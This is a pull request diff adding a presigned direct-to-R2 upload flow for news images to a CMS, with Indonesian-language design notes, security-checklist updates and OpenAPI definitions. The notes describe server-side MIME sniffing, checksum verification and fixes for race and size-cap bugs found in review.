### PR TITLE
feat(storage): add direct-to-R2 presigned upload flow for news images

### DIFF
--- a/.changeset/news-media-presigned-upload-issue-634.md
+++ b/.changeset/news-media-presigned-upload-issue-634.md
@@ -1,0 +1,31 @@
+---
+"awcms-mini": minor
+---
+
+Add the direct-to-R2 presigned upload flow for news images (Issue #634,
+epic `news_portal` #631-#642/#649): `POST
+/api/v1/media/news-images/upload-sessions` (create — server-generated
+object key, short-lived presigned PUT URL, never a raw R2 credential),
+`POST .../{id}/finalize` (high-risk, `Idempotency-Key` required), and
+`POST .../{id}/cancel`.
+
+Closes the security-auditor Critical finding on Issue #631: `finalize`
+never promotes a media object to `verified` from a bare `HEAD` check.
+It performs a `HEAD` (existence + real size) followed by a full `GET`,
+sniffs the MIME type from the object's actual magic bytes
+(`domain/news-media-mime-sniffer.ts`, allow-list-only — JPEG/PNG/WebP/
+GIF), and computes a SHA-256 checksum server-side from the bytes
+actually read (`application/news-media-r2-verification.ts`,
+`domain/news-media-finalize-decision.ts`). A client-claimed checksum
+(optional) is compared only as a transport-corruption check, never as
+a substitute for the MIME sniff. Every R2 call (`Bun.S3Client`, no npm
+AWS/S3 SDK) runs strictly outside any DB transaction (ADR-0006), behind
+a dedicated `news-media-r2` circuit breaker + timeout
+(`infrastructure/news-media-r2-client.ts`).
+
+Adds migration `042` seeding the `news_portal.media.*` permission
+catalog (`create`/`read`/`verify`/`attach`/`detach`/`delete`/
+`restore`/`purge`/`cancel` — reusing Issue #633's `NEWS_MEDIA_PERMISSIONS`
+constants exactly, plus a new `cancel` permission for aborting one's own
+not-yet-uploaded session) and wires them into `news_portal`'s module
+descriptor (`permissions`, `api`) for the first time.

--- a/.claude/skills/awcms-mini-news-portal/SKILL.md
+++ b/.claude/skills/awcms-mini-news-portal/SKILL.md
@@ -39,7 +39,7 @@ status + pointer, bukan menduplikasi isinya.
 | #631  | Dokumentasi arsitektur full-online R2-only + SOP + security + IR + backup + user guide                                       | **Selesai** — lihat §Dokumen yang sudah ada di bawah |
 | #632  | Preset `news_portal_full_online_r2` (module descriptor/config gate)                                                          | **Selesai** — lihat §632 di bawah                    |
 | #633  | Tenant-scoped R2-only media object registry (schema + migration)                                                             | **Selesai** — lihat §633 di bawah                    |
-| #634  | Direct-to-R2 presigned upload flow (endpoint upload/confirm)                                                                 | Belum dikerjakan — lihat §634 di bawah               |
+| #634  | Direct-to-R2 presigned upload flow (endpoint upload/confirm)                                                                 | **Selesai** — lihat §634 di bawah                    |
 | #635  | Config validation + readiness checks (`config:validate`/`security:readiness`/`production:preflight`) untuk R2 image delivery | Belum dikerjakan — lihat §635 di bawah               |
 | #636  | `blog_content` wajib referensi R2 media object untuk gambar berita saat mode aktif                                           | Belum dikerjakan — lihat §636 di bawah               |
 | #637  | Editorial homepage section composer `/news` dengan render R2-only                                                            | Belum dikerjakan — lihat §637 di bawah               |
@@ -508,27 +508,173 @@ array dan memanggil `authorizeInTransaction` (skill
 - Docs: `full-online-r2-architecture.md` §5/§6/§16 (status diperbarui),
   `04_erd_data_dictionary.md` (§News Portal baru ditambah).
 
-## §634 — Direct-to-R2 presigned upload flow (belum dikerjakan)
+## §634 — Direct-to-R2 presigned upload flow (Selesai)
 
-Ringkasan scope: endpoint upload presigned + confirm (Jalur A) dan/atau
-server-streaming (Jalur B) sesuai `r2-upload-sop.md` §2/§3. Implementor
-**wajib**: `Idempotency-Key` untuk langkah `confirm` (skill
-`awcms-mini-idempotency`), audit event formal untuk `confirm`
-sukses/gagal (skill `awcms-mini-audit-log`, bukan sekadar correlation-ID
-logging), panggilan R2 di luar DB transaction (ADR-0006), circuit
-breaker + timeout (pola sama `object-storage` breaker `sync-storage`
-sudah pakai), validasi berlapis persis urutan
-`full-online-r2-architecture.md` §9. **Titik paling kritis (temuan
-security-auditor #631, sudah diperbaiki di dokumen arsitektur)**:
-langkah `confirm` Jalur A HARUS melakukan `GET` penuh objek dari R2
-(bukan `HEAD` saja) untuk menjalankan MIME sniffing dari magic bytes
-dan menghitung checksum server-side dari isi objek — `HEAD` hanya
-membuktikan sesuatu ter-upload, bukan apa yang ter-upload, dan
-membandingkan checksum aktual dari `HEAD`/ETag terhadap klaim client
-adalah pemeriksaan self-referential yang tidak menutup upload konten
-berbahaya berkedok gambar. Tambahkan test integrasi yang meng-upload
-payload HTML/JS berkedok `.jpg` dan membuktikan `confirm` menolaknya
-sebelum menganggap implementasi ini benar.
+Implementasi lengkap Jalur A (`r2-upload-sop.md` §2) — tiga endpoint:
+`POST /api/v1/media/news-images/upload-sessions` (create),
+`POST .../{id}/finalize`, `POST .../{id}/cancel`. Jalur B (server-
+streaming, §3) **tidak** diimplementasikan — di luar cakupan issue ini,
+Jalur A sudah mencukupi acceptance criteria.
+
+### KONFIRMASI KRUSIAL — finalize melakukan GET penuh + magic-byte sniffing + checksum server-side, BUKAN HEAD-only
+
+Body issue #634 di GitHub menulis "Server verifies object existence and
+metadata via R2 HEAD/metadata" — kalimat itu SENGAJA TIDAK diikuti
+karena sudah usang dibanding keputusan arsitektur pasca-review (temuan
+Critical security-auditor #631) di `full-online-r2-architecture.md` §9
+dan `r2-upload-sop.md` §2 langkah 5. Implementasi nyata:
+`src/modules/news-portal/application/news-media-r2-verification.ts`'s
+`verifyNewsMediaR2Object` — urutan PERSIS: (1) `client.headObject()`
+(cek cepat eksistensi + `Content-Length` real, short-circuit sebelum
+`GET` kalau objek tidak ada atau kelebihan ukuran — hemat bandwidth
+sesuai §9 poin 1), (2) `client.getObject()` = `S3File.arrayBuffer()`
+(GET PENUH, bukan ranged/partial), (3) `sniffNewsMediaMimeType(bytes)`
+(`domain/news-media-mime-sniffer.ts`, magic-byte allow-list JPEG/PNG/
+WebP/GIF — payload apa pun yang tidak cocok, termasuk HTML/JS berkedok
+`.jpg`, sniff ke `undefined`), (4) `Bun.CryptoHasher("sha256")` dihitung
+dari BYTE YANG SAMA yang dibaca di langkah 2 (bukan hash ulang beberapa
+byte pertama), (5) `decideNewsMediaFinalizeOutcome`
+(`domain/news-media-finalize-decision.ts`) — keputusan MIME/konten
+SELALU dari hasil sniffing; checksum klaim client (opsional, di body
+finalize request, BUKAN create — lihat Rekonsiliasi checksum di bawah)
+HANYA dibandingkan sebagai deteksi korupsi transport, tidak pernah
+menggantikan sniffing. `HEAD` (langkah 1) TIDAK PERNAH sendirian
+menaikkan status — bila objek tidak ada atau kelebihan ukuran, request
+ditolak SEBELUM `GET` sama sekali dipanggil (defense-in-depth, tapi
+tetap lewat urutan HEAD-lalu-GET, bukan HEAD-saja).
+
+Route (`pages/api/v1/media/news-images/upload-sessions/[id]/finalize.ts`)
+hanya parsing/validasi HTTP tipis — logika nyata ada di
+`application/news-media-finalize-upload-session.ts`'s
+`finalizeNewsMediaUploadSession` (dua transaksi `withTenant` terpisah
+mengapit panggilan R2 di tengah, ADR-0006 — precheck row/TTL/idempotency
+di tx pertama, commit, panggil R2 di luar transaksi, lalu tx kedua
+menulis hasil `verified`/`failed`). Test yang membuktikan HTML/JS
+berkedok gambar ditolak:
+`tests/integration/news-media-upload-session-api.integration.test.ts`'s
+"HTML/JS payload disguised as a .jpg (Issue #631 exploit scenario) is
+REJECTED" — meng-upload byte HTML/`<script>` sungguhan ke objek R2 palsu
+(fake in-memory S3 server, `Bun.serve`, path-style `/{bucket}/{key}`,
+dikonfirmasi empiris cocok dengan request nyata `Bun.S3Client`) yang
+key/claimed-mime-type-nya bilang `image/jpeg`, lalu memastikan
+`finalize` mengembalikan `422 UPLOAD_VERIFICATION_FAILED` dengan
+`reason: "mime_not_recognized"`, baris tetap `failed` (bukan
+`verified`), dan audit event `news_media.object.finalize_rejected`
+tercatat. Test serupa di level unit (tanpa DB):
+`tests/unit/news-media-mime-sniffer.test.ts`,
+`tests/unit/news-media-finalize-decision.test.ts`,
+`tests/unit/news-media-r2-verification.test.ts`.
+
+### Kenapa test R2-dependent tidak lewat route HTTP langsung
+
+Route Astro punya signature tetap `(context) => Response`, tidak ada
+seam untuk inject R2 client palsu ke test. `finalizeNewsMediaUploadSession`
+diekstrak ke `application/news-media-finalize-upload-session.ts` persis
+supaya punya `deps.createR2Client` yang bisa di-override test (pola sama
+`dispatchObjectSyncQueue`'s `resolveUploader` option di `sync-storage`,
+diterapkan satu layer lebih dalam karena di situlah seam-nya nyata ada).
+Skenario yang TIDAK butuh R2 nyata (auth/tenant/ABAC, validasi shape,
+idempotency-required, not-found, wrong-status, expired-session — semua
+diputuskan dari state DB semata sebelum R2 dipanggil sama sekali) tetap
+di-test lewat route asli (`invoke()`). Skenario yang butuh R2 (accept,
+object-not-found, mime-mismatch/exploit, checksum-mismatch) memanggil
+`finalizeNewsMediaUploadSession` langsung dengan `Bun.S3Client` sungguhan
+menunjuk ke fake server lokal.
+
+### Rekonsiliasi permission — pakai `news_portal.media.*` dari #633, BUKAN `media_objects.news_images.*` dari body issue #634
+
+Body issue #634 menyarankan
+`media_objects.news_images.{upload,read,attach,delete}`. TIDAK diikuti —
+`news-media-permissions.ts` (#633) sudah membekukan
+`news_portal.media.{create,read,verify,attach,detach,delete,restore,purge}`
+lebih dulu, dan file itu sendiri sudah menulis eksplisit "#634 WAJIB
+pakai persis konstanta ini". Verifikasi dilakukan: tidak ada modul lain
+di repo ini bernama `media_objects` atau pattern permission generik
+serupa (`grep` tidak menemukan apa pun) — jadi tidak ada konflik nyata
+untuk direkonsiliasi selain penamaan itu sendiri. Pemetaan endpoint →
+permission: create session → `news_portal.media.create` (action
+`"create"`, sudah ada di `AccessAction` union); finalize → `news_portal.media.verify`
+(action `"verify"`, sudah ada); cancel → permission BARU
+`news_portal.media.cancel` (action `"cancel"`, sudah ada duluan di
+`AccessAction` union untuk keperluan sync/POS — direuse, bukan
+ditambah). `cancel` ditambahkan ke `NEWS_MEDIA_PERMISSIONS` karena #633
+tidak pernah menganggarkan konsep "upload session" sama sekali (registry
+saat itu hanya berpikir dalam status lifecycle objek, bukan sesi
+presigned) — ini ekstensi aditif, bukan kontradiksi terhadap set #633.
+Migration `042_awcms_mini_news_media_permissions.sql` menyeed sembilan
+baris (delapan dari #633 + `cancel` baru) ke `awcms_mini_permissions`,
+dan `module.ts`'s `permissions` array (BARU dideklarasikan issue ini,
+sebelumnya sengaja `undefined`) menyalin PERSIS sembilan action yang
+sama — diverifikasi test
+(`tests/modules/news-portal-module.test.ts`'s "every declared
+permission's activityCode/action reproduces exactly one
+NEWS_MEDIA_PERMISSIONS constant").
+
+### Rekonsiliasi checksum klaim client — di body FINALIZE, bukan di body CREATE seperti tersirat SOP
+
+`r2-upload-sop.md` §2 langkah 5 menulis "checksum yang diklaim di
+langkah 1" (create) dibandingkan di langkah finalize — tapi migration
+041 (#633, schema BEKU, tidak diubah issue ini) hanya punya SATU kolom
+`checksum_sha256`, diisi dari nilai HASIL PERHITUNGAN SERVER saat
+`markNewsMediaObjectUploaded`, bukan dari klaim client. Tidak ada kolom
+untuk menyimpan klaim client terpisah dari nilai final itu. Solusi:
+`checksumSha256` opsional diterima di BODY FINALIZE (bukan create) —
+fungsional setara (klien Jalur A memegang byte yang sama persis untuk
+kedua request, tidak ada kerugian menyertakan ulang di request kedua)
+tanpa perlu migration baru. `CreateNewsMediaUploadSessionRequest` di
+OpenAPI TIDAK punya field checksum sama sekali;
+`FinalizeNewsMediaUploadSessionRequest` punya `checksumSha256` opsional.
+
+### File yang dibuat/diubah (referensi cepat)
+
+- `sql/042_awcms_mini_news_media_permissions.sql`.
+- `src/modules/news-portal/domain/news-media-mime-sniffer.ts`,
+  `domain/news-media-finalize-decision.ts`,
+  `domain/news-media-upload-session-validation.ts`; diperbarui:
+  `domain/news-media-permissions.ts` (tambah `cancel`).
+- `src/modules/news-portal/infrastructure/news-media-r2-client.ts`
+  (`Bun.S3Client` wrapper: presign/HEAD/GET, circuit breaker
+  `"news-media-r2"`, timeout — pola sama `object-storage-uploader.ts`).
+- `src/modules/news-portal/application/news-media-r2-verification.ts`
+  (orkestrasi HEAD→GET→sniff→checksum→decision, tanpa `tx`, murni R2 +
+  domain), `application/news-media-finalize-upload-session.ts`
+  (orkestrasi finalize penuh: precheck tx → R2 verify → outcome tx,
+  `deps.createR2Client` injectable untuk test).
+- `src/pages/api/v1/media/news-images/upload-sessions/index.ts` (create),
+  `.../[id]/finalize.ts`, `.../[id]/cancel.ts` — route tipis.
+- Diperbarui: `src/modules/news-portal/module.ts` (`permissions`, `api`
+  baru dideklarasikan, versi 0.1.0→0.2.0).
+- `openapi/awcms-mini-public-api.openapi.yaml` (tag "News Media", tiga
+  path, lima schema baru).
+- Test: `tests/unit/news-media-mime-sniffer.test.ts`,
+  `tests/unit/news-media-finalize-decision.test.ts`,
+  `tests/unit/news-media-upload-session-validation.test.ts`,
+  `tests/unit/news-media-r2-client.test.ts`,
+  `tests/unit/news-media-r2-verification.test.ts`,
+  `tests/integration/news-media-upload-session-api.integration.test.ts`;
+  diperbarui: `tests/unit/news-media-permissions.test.ts` (9 keys,
+  module.ts kini deklarasikan permissions),
+  `tests/modules/news-portal-module.test.ts`,
+  `tests/unit/news-portal-no-local-fallback.test.ts` (extend scan ke
+  `src/pages/api/v1/media/news-images`), `tests/foundation.test.ts`
+  (migration list 042).
+- Changeset: `.changeset/news-media-presigned-upload-issue-634.md`.
+
+### Belum/di luar cakupan issue ini (untuk issue lanjutan)
+
+- Jalur B (server-streaming) — tidak diimplementasikan.
+- Job pembersihan objek R2 `failed`/`orphaned`/`pending` kedaluwarsa —
+  finalize hanya MENANDAI baris `failed` dan mengaudit, TIDAK
+  menghapus objek R2 sungguhan (`r2-backup-lifecycle.md`'s lifecycle
+  job, kemungkinan besar #635, di luar cakupan issue ini).
+- Endpoint `attach` nyata (permission `news_portal.media.attach` sudah
+  di-declare, tapi belum ada route yang memanggilnya) — verifikasi
+  `owner_resource_id` exist+tenant-match (temuan Medium security-auditor
+  PR #652, dicatat di §633 di atas) masih WAJIB ditegakkan issue yang
+  menambah endpoint attach nyata, BUKAN issue ini.
+- Retention/legal-hold pada purge — masih gap sistemik yang sama
+  (dicatat di §633), tidak disentuh issue ini (tidak ada endpoint purge
+  nyata yang dirilis di sini).
 
 ## §635 — Readiness checks (belum dikerjakan)
 

--- a/.claude/skills/awcms-mini-news-portal/SKILL.md
+++ b/.claude/skills/awcms-mini-news-portal/SKILL.md
@@ -616,7 +616,9 @@ NEWS_MEDIA_PERMISSIONS constant").
 langkah 1" (create) dibandingkan di langkah finalize — tapi migration
 041 (#633, schema BEKU, tidak diubah issue ini) hanya punya SATU kolom
 `checksum_sha256`, diisi dari nilai HASIL PERHITUNGAN SERVER saat
-`markNewsMediaObjectUploaded`, bukan dari klaim client. Tidak ada kolom
+`markNewsMediaObjectVerified` (bukan `markNewsMediaObjectUploaded` —
+sejak PR #653 re-review, klaim atomik `pending_upload->uploaded` terjadi
+SEBELUM GET nyata, lihat subbagian di bawah), bukan dari klaim client. Tidak ada kolom
 untuk menyimpan klaim client terpisah dari nilai final itu. Solusi:
 `checksumSha256` opsional diterima di BODY FINALIZE (bukan create) —
 fungsional setara (klien Jalur A memegang byte yang sama persis untuk
@@ -624,6 +626,85 @@ kedua request, tidak ada kerugian menyertakan ulang di request kedua)
 tanpa perlu migration baru. `CreateNewsMediaUploadSessionRequest` di
 OpenAPI TIDAK punya field checksum sama sekali;
 `FinalizeNewsMediaUploadSessionRequest` punya `checksumSha256` opsional.
+
+### PR #653 re-review — dua temuan security-auditor ditutup, jangan diperkenalkan ulang
+
+PR #653 (issue ini) melalui SATU putaran review setelah commit awal — reviewer
+
+- security-auditor menemukan dua bug nyata pada implementasi finalize:
+
+1. **Critical (TOCTOU size-cap)**: `getObject` semula memanggil
+   `file.arrayBuffer()` — buffer SELURUH objek ke memori SEBELUM ukurannya
+   dicek. Presigned PUT URL bisa dipakai ulang, jadi penyerang bisa
+   menimpa objek dengan file raksasa DI ANTARA `headObject` (yang
+   melaporkan ukuran kecil) dan `getObject` (yang membaca byte
+   sesungguhnya) — proses bisa OOM. **Fix**: `getObject(objectKey,
+maxBytes)` sekarang membaca via `readCappedStream` (helper diekspor
+   dari `news-media-r2-client.ts`, bisa diuji langsung terhadap
+   `ReadableStream` sintetis) yang membatalkan (`reader.cancel()`) baca
+   PERSIS saat total terbaca melebihi `maxBytes`, TANPA pernah
+   mengakumulasi lebih dari `maxBytes`. `verifyNewsMediaR2Object`
+   memperlakukan `get.sizeExceeded` sebagai OTORITATIF, mengalahkan
+   `head.sizeBytes` yang mungkin basi.
+2. **High (concurrent-finalize cost amplification)**: N panggilan
+   `finalize` konkuren dengan `Idempotency-Key` BERBEDA terhadap
+   `objectId` yang SAMA dulunya masing-masing mencapai
+   `verifyNewsMediaR2Object` sendiri-sendiri (masing-masing bayar
+   `HEAD`+`GET` sendiri). **Fix**: `markNewsMediaObjectUploaded(tx,
+tenantId, objectId)` (kini `input` opsional, `COALESCE` di SQL) dipakai
+   sebagai KLAIM ATOMIK (`pending_upload -> uploaded`) DI DALAM transaksi
+   precheck, SEBELUM panggilan R2 apa pun — `WHERE status =
+'pending_upload'`-nya adalah primitif mutual-exclusion (Postgres
+   menyerialkan `UPDATE` konkuren pada baris yang sama). Pemenang lanjut
+   ke R2; yang kalah dapat `409` murah, TANPA pernah memanggil R2.
+
+**Konsekuensi desain yang WAJIB dipertahankan issue lanjutan**: klaim
+`uploaded` kini dipegang lintas satu transaksi DB TERPISAH (bukan lagi
+satu transaksi yang sama dengan resolusi `verified`/`failed`) selama
+panggilan R2 nyata berjalan. Ini butuh jalur revert eksplisit
+(`revertNewsMediaObjectUploadClaim`, `uploaded -> pending_upload`) —
+dipanggil untuk (a) outcome `provider_error` yang sudah ditangani, DAN
+(b) EXCEPTION TAK TERDUGA apa pun dari `verifyNewsMediaR2Object` atau
+transaksi resolusi (bug, OOM, dll) — lihat `try/catch` di
+`finalizeNewsMediaUploadSession`. Tanpa (b), crash di antara commit klaim
+dan resolusi meninggalkan baris macet PERMANEN di `uploaded` (baik
+`finalize` maupun `cancel` mensyaratkan `pending_upload`) — TIDAK ADA
+reaper/job pembersihan untuk baris `uploaded` basi saat ini (beda dari
+`pending_upload`, yang punya TTL check). Jangan hapus `try/catch` ini
+demi "menyederhanakan" tanpa menambahkan job rekonsiliasi sepadan
+terlebih dahulu.
+
+Perbaikan idempotency terkait: outcome `rejected` (422) kini JUGA
+menyimpan idempotency record-nya sendiri (`saveIdempotencyRecord` dengan
+status 422) — sebelumnya hanya jalur sukses (200) yang disimpan, jadi
+retry dengan `Idempotency-Key` yang sama setelah rejection akan jatuh ke
+guard status (`row.status !== "pending_upload"`) dan dapat respons
+BERBEDA ("Cannot finalize... status failed"), melanggar kontrak "key +
+request sama -> replay identik".
+
+Test yang membuktikan kedua fix + regresi: `tests/unit/news-media-r2-client.test.ts`
+(`readCappedStream` langsung + skenario objek ditukar via loopback
+server berbadan besar-tapi-terhingga — JANGAN pakai `pull()` yang
+`enqueue()` tanpa henti/tanpa `close()`, itu bug desain test yang
+menggantung runtime Bun bahkan tanpa `Bun.S3Client` sama sekali, bukan
+properti kode yang diuji), `tests/unit/news-media-r2-verification.test.ts`
+(`sizeExceeded: true` otoritatif meski `HEAD` klaim ukuran dalam batas),
+`tests/integration/news-media-object-registry.integration.test.ts`
+(`markNewsMediaObjectUploaded` tanpa argumen sebagai klaim + guard
+kedua-klaim-kalah, `revertNewsMediaObjectUploadClaim` transisi balik +
+no-op di status lain), `tests/integration/news-media-upload-session-api.integration.test.ts`
+(provider_error → 502 → klaim direvert → retry key baru sukses; 422
+di-replay identik dengan key sama, bukan jatuh ke guard status).
+
+Residual (dicatat security-auditor, BUKAN blocker go-live, untuk issue
+lanjutan): `withTimeout` (`src/lib/integration/timeout.ts`) tidak
+membatalkan stream yang sedang dibaca saat timeout tercapai — pembacaan
+`readCappedStream` di background tetap berjalan sampai selesai/di-GC
+(bounded ke `maxBytes`, jadi bukan lagi unbounded, tapi belum benar-benar
+"dihentikan"); dan belum ada test konkurensi race NYATA (dua `finalize`
+paralel sungguhan) — argumen korektnya saat ini bertumpu pada inspeksi
+semantik `READ COMMITTED` Postgres di `withTenant`, bukan test
+merah/hijau.
 
 ### File yang dibuat/diubah (referensi cepat)
 

--- a/docs/awcms-mini/news-portal/full-online-r2-architecture.md
+++ b/docs/awcms-mini/news-portal/full-online-r2-architecture.md
@@ -160,8 +160,8 @@ awcms_mini_news_media_objects (tenant-scoped, RLS ENABLE+FORCE)
 - original_filename         text, nullable    -- hanya untuk tampilan, TIDAK pernah masuk object_key (§6)
 - public_url                text NOT NULL     -- dibangun server dari NEWS_MEDIA_R2_PUBLIC_BASE_URL (#632), tidak pernah dari input client
 - mime_type                 text NOT NULL     -- hasil validasi server (§9), bukan input mentah client
-- size_bytes                bigint, nullable  -- terisi saat status='uploaded'
-- checksum_sha256           text, nullable
+- size_bytes                bigint, nullable  -- terisi saat status='verified' (bukan 'uploaded' — Issue #634 PR #653: klaim atomik pending_upload->uploaded terjadi SEBELUM GET nyata, jadi nilai asli baru diketahui saat verified)
+- checksum_sha256           text, nullable    -- terisi saat status='verified', dari bytes GET nyata yang sama (lihat baris di atas)
 - width/height              integer, nullable -- terisi saat status='verified'
 - alt_text, caption         text, nullable    -- aksesibilitas (doc 14), wajib diisi sebelum publish (Issue #636/#640)
 - status                    text — pending_upload|uploaded|verified|attached|orphaned|deleted|failed (elaborasi 7-state dari sketsa pending|confirmed|orphaned|deleted semula — lihat migration 041's header comment)

--- a/docs/awcms-mini/news-portal/full-online-r2-architecture.md
+++ b/docs/awcms-mini/news-portal/full-online-r2-architecture.md
@@ -524,16 +524,16 @@ Bukan tabel kosong — setiap baris merujuk keputusan konkret di atas.
 
 ### ISO/IEC 27001:2022 Annex A
 
-| Kontrol Annex A                           | Implementasi                                                                                                                            |
-| ----------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------- |
-| **A.5.15 Kontrol akses**                  | Presigned upload di-generate hanya untuk identity dengan permission `news_media.upload` (rencana Issue #633/#634), tidak pernah publik. |
-| **A.5.23 Keamanan layanan cloud**         | §2 — segregasi bucket/kredensial per fungsi (media publik vs sync privat), §13 least-privilege token per bucket.                        |
-| **A.8.10 Penghapusan informasi**          | §8/§12 objek `pending` kedaluwarsa dibersihkan; `r2-backup-lifecycle.md` §Retention untuk penghapusan objek `deleted`.                  |
-| **A.8.12 Pencegahan kebocoran data**      | §10 CORS allow-list eksplisit (bukan wildcard); §2 bucket terpisah mencegah kebocoran objek sync privat lewat konfigurasi publik.       |
-| **A.8.24 Kriptografi**                    | §9 checksum SHA-256 wajib untuk integritas; TLS wajib untuk custom domain (§11) dan komunikasi ke R2 API.                               |
-| **A.8.25 Siklus hidup pengembangan aman** | §9 urutan validasi defense-in-depth wajib diimplementasikan sebelum kode upload ditulis (ISO 27034, lihat di bawah).                    |
-| **A.5.30 Kesiapan TIK untuk kontinuitas** | §16/22301 di bawah — tidak ada fallback lokal berarti kesiapan R2 sendiri jadi kritis; lihat `r2-backup-lifecycle.md`.                  |
-| **A.5.34 Privasi dan perlindungan PII**   | §5 minimisasi metadata, §6 object key tidak pernah berisi nama file/PII; `r2-backup-lifecycle.md` §Privasi.                             |
+| Kontrol Annex A                           | Implementasi                                                                                                                                                                               |
+| ----------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
+| **A.5.15 Kontrol akses**                  | Presigned upload di-generate hanya untuk identity dengan permission `news_portal.media.create` (finalize: `news_portal.media.verify`) — diimplementasikan Issue #634, tidak pernah publik. |
+| **A.5.23 Keamanan layanan cloud**         | §2 — segregasi bucket/kredensial per fungsi (media publik vs sync privat), §13 least-privilege token per bucket.                                                                           |
+| **A.8.10 Penghapusan informasi**          | §8/§12 objek `pending` kedaluwarsa dibersihkan; `r2-backup-lifecycle.md` §Retention untuk penghapusan objek `deleted`.                                                                     |
+| **A.8.12 Pencegahan kebocoran data**      | §10 CORS allow-list eksplisit (bukan wildcard); §2 bucket terpisah mencegah kebocoran objek sync privat lewat konfigurasi publik.                                                          |
+| **A.8.24 Kriptografi**                    | §9 checksum SHA-256 wajib untuk integritas; TLS wajib untuk custom domain (§11) dan komunikasi ke R2 API.                                                                                  |
+| **A.8.25 Siklus hidup pengembangan aman** | §9 urutan validasi defense-in-depth wajib diimplementasikan sebelum kode upload ditulis (ISO 27034, lihat di bawah).                                                                       |
+| **A.5.30 Kesiapan TIK untuk kontinuitas** | §16/22301 di bawah — tidak ada fallback lokal berarti kesiapan R2 sendiri jadi kritis; lihat `r2-backup-lifecycle.md`.                                                                     |
+| **A.5.34 Privasi dan perlindungan PII**   | §5 minimisasi metadata, §6 object key tidak pernah berisi nama file/PII; `r2-backup-lifecycle.md` §Privasi.                                                                                |
 
 ### ISO/IEC 27002:2022
 
@@ -655,14 +655,14 @@ auth-online-hardening di dokumen yang sama).
 
 ## 16. Peta issue lanjutan
 
-| Issue                 | Bagian dokumen ini yang diimplementasikan                                                      |
-| --------------------- | ---------------------------------------------------------------------------------------------- |
-| #632                  | §4 env var + preset `news_portal_full_online_r2`, §1 gating full-online                        |
-| #633                  | §5 media registry schema, §6 object key generator — **diimplementasikan**                      |
-| #634                  | §7 alur upload, §8 presigned URL, §9 validasi                                                  |
-| #635                  | §13 readiness (`config:validate`/`security:readiness`/`production:preflight`)                  |
-| #636                  | §5 "konten editorial wajib menunjuk media confirmed" diterapkan ke `blog_content`              |
-| #637-#640, #642, #649 | Konsumsi media registry untuk fitur editorial spesifik (lihat skill untuk ringkasan per issue) |
+| Issue                 | Bagian dokumen ini yang diimplementasikan                                                                                           |
+| --------------------- | ----------------------------------------------------------------------------------------------------------------------------------- |
+| #632                  | §4 env var + preset `news_portal_full_online_r2`, §1 gating full-online                                                             |
+| #633                  | §5 media registry schema, §6 object key generator — **diimplementasikan**                                                           |
+| #634                  | §7 alur upload, §8 presigned URL, §9 validasi — **diimplementasikan** (lihat `.claude/skills/awcms-mini-news-portal/SKILL.md` §634) |
+| #635                  | §13 readiness (`config:validate`/`security:readiness`/`production:preflight`)                                                       |
+| #636                  | §5 "konten editorial wajib menunjuk media confirmed" diterapkan ke `blog_content`                                                   |
+| #637-#640, #642, #649 | Konsumsi media registry untuk fitur editorial spesifik (lihat skill untuk ringkasan per issue)                                      |
 
 ## 17. Referensi
 

--- a/docs/awcms-mini/news-portal/r2-security-checklist.md
+++ b/docs/awcms-mini/news-portal/r2-security-checklist.md
@@ -156,14 +156,25 @@ menunggu #635):
   menjalankan `config:validate` dan `security:readiness` sebagai bagian
   urutannya, doc 18); kedua check di atas otomatis ikut terpanggil.
 
-**Masih terbuka untuk #633/#634/#635** (di luar cakupan #632): tidak ada
-check di atas yang menyentuh tabel media registry itu sendiri (objek
-`pending` basi, orphaned object detection — `r2-backup-lifecycle.md` §2)
-atau perilaku runtime endpoint upload (MIME sniffing dari magic bytes,
-checksum server-side dari isi objek — §9 arsitektur) karena tabel/endpoint
-itu belum ada. Implementor #633/#634/#635 **wajib** memperbarui bagian ini
-lagi begitu check readiness baru yang relevan ke schema/endpoint tersebut
-ditulis.
+**Update #634**: endpoint upload nyata sudah ada
+(`POST /api/v1/media/news-images/upload-sessions`,
+`.../{id}/finalize`, `.../{id}/cancel`) dan MIME sniffing dari magic
+bytes + checksum server-side dari isi objek **sudah ditegakkan di
+runtime endpoint itu sendiri**
+(`src/modules/news-portal/application/news-media-r2-verification.ts`,
+`domain/news-media-mime-sniffer.ts`, `domain/news-media-finalize-decision.ts`
+— lihat `.claude/skills/awcms-mini-news-portal/SKILL.md` §634 untuk
+detail lengkap) — ini bukan lagi gap, karena penegakannya terjadi
+sinkron di jalur request `finalize`, bukan lewat readiness-check
+terpisah.
+
+**Masih terbuka untuk #635** (di luar cakupan #632/#633/#634): tidak ada
+`config:validate`/`security:readiness`/`production:preflight` check yang
+menyentuh tabel media registry itu sendiri (objek `pending`/`failed`
+basi, orphaned object detection — `r2-backup-lifecycle.md` §2) — itu
+tetap murni operasional/lifecycle-job scope, belum ada implementasinya.
+Implementor #635 **wajib** memperbarui bagian ini lagi begitu check
+readiness baru yang relevan ditulis.
 
 ## 8. Monitoring & audit
 

--- a/openapi/awcms-mini-public-api.openapi.yaml
+++ b/openapi/awcms-mini-public-api.openapi.yaml
@@ -138,6 +138,16 @@ tags:
       sessions/events is omitted unless the caller holds the separate
       `visitor_analytics.raw_detail.read` permission, independent of
       `sessions.read`/`events.read`.
+  - name: News Media
+    description: >-
+      Direct-to-R2 presigned upload flow for news images (epic
+      `news_portal` #631-#642/#649, Issue #634) — create an upload
+      session (server-generated object key + short-lived presigned `PUT`
+      URL), finalize (real R2 `GET` + magic-byte MIME sniffing +
+      server-side SHA-256 checksum — never a bare `HEAD`, per the
+      security-auditor Critical finding on Issue #631), and cancel a
+      still-`pending_upload` session. R2 credentials are never exposed to
+      the browser; only a scoped, expiring presigned URL is returned.
 paths:
   /api/v1/sync/push:
     post:
@@ -7799,6 +7809,191 @@ paths:
                 $ref: "#/components/schemas/ApiError"
         "500":
           $ref: "#/components/responses/InternalError"
+  /api/v1/media/news-images/upload-sessions:
+    post:
+      tags:
+        - News Media
+      summary: Create a direct-to-R2 presigned upload session for a news image
+      operationId: newsMediaUploadSessionsCreate
+      security:
+        - bearerAuth: []
+          tenantHeader: []
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+        - $ref: "#/components/parameters/RequestId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/CreateNewsMediaUploadSessionRequest"
+      responses:
+        "200":
+          description: >-
+            Upload session created — a `pending_upload` metadata row plus a
+            short-lived presigned PUT URL scoped to exactly one
+            server-generated object key. Never includes raw R2 credentials.
+          content:
+            application/json:
